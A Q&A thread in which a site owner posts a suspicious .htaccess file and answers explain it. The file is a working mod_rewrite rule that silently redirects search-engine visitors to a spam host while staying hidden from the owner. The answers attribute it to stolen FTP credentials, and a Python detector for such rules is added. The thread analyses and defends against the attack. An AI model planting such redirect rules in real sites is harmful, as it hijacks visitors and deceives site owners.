Suspicious .htaccess File
This was uploaded to one of my FTP folders. I'm not familiar with Apache, but still curious - can someone tell me what type of dastardly act this file is trying to commit? Thanks!
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
Solution 1:
That sends users that come from a search engine to the last site, SPAMMER.info (see question history for actual site).
It looks for referrers in an attempt to hide from you, since you likely don't access the site via search engines. That is, if you go to the URL directly, everything seems normal. However, if you come in via a search engine, you get redirected.
Note: this does not affect web crawlers as they (googlebot, at least) don't set the referrer header.
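A way to check other .htaccess files for the same pattern, as an added example that is not part of the original answers: it flags any RewriteRule that points to another host and is guarded by Referer conditions. The function name, the `own_hosts` parameter and the sample (with the placeholder host `spam.example`) are constructed for illustration.

```python
import re

# Constructed sample shaped like the file in the question (placeholder host,
# shortened condition list), followed by an ordinary front-controller rule.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://spam.example/0/go.php?sid=2 [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ index.php [L]
"""

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
# An absolute URL to a different host is always an external redirect in
# mod_rewrite, whether or not the [R] flag is present.
EXTERNAL = re.compile(r"^https?://([^/:?#]+)", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Return one finding per RewriteRule that redirects to a foreign host
    and whose preceding RewriteCond lines test the Referer header."""
    findings, conds = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = COND.match(line)
        if m:
            conds.append((m.group(1), m.group(2)))
            continue
        m = RULE.match(line)
        if not m:
            continue
        # RewriteCond lines apply only to the next RewriteRule, so consume them.
        patterns = [p for var, p in conds if "REFERER" in var.upper()]
        conds = []
        target = EXTERNAL.match(m.group(2))
        if target and patterns and target.group(1).lower() not in own_hosts:
            findings.append({"line": lineno,
                             "host": target.group(1).lower(),
                             "referer_patterns": patterns})
    return findings

if __name__ == "__main__":
    for f in find_referer_redirects(SAMPLE):
        print(f"line {f['line']}: referer-gated redirect to {f['host']}")
```

Pass your own domains in `own_hosts` so that legitimate canonical-host redirects are not reported.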
Solution 2:
Any time a user from a search engine visits any page on your site, they'll be redirected to the .info spam site.
It's very sneaky - you won't notice anything is wrong as you'll normally just type the address in.
Solution 3:
To add more: most probably your FTP credentials got leaked. Maybe you had them saved in FileZilla / Total Commander etc. There is plenty of malware stealing those and then 'going' around, logging on to FTP accounts, attaching malicious JavaScript to index.php / html or putting similar rewrite files.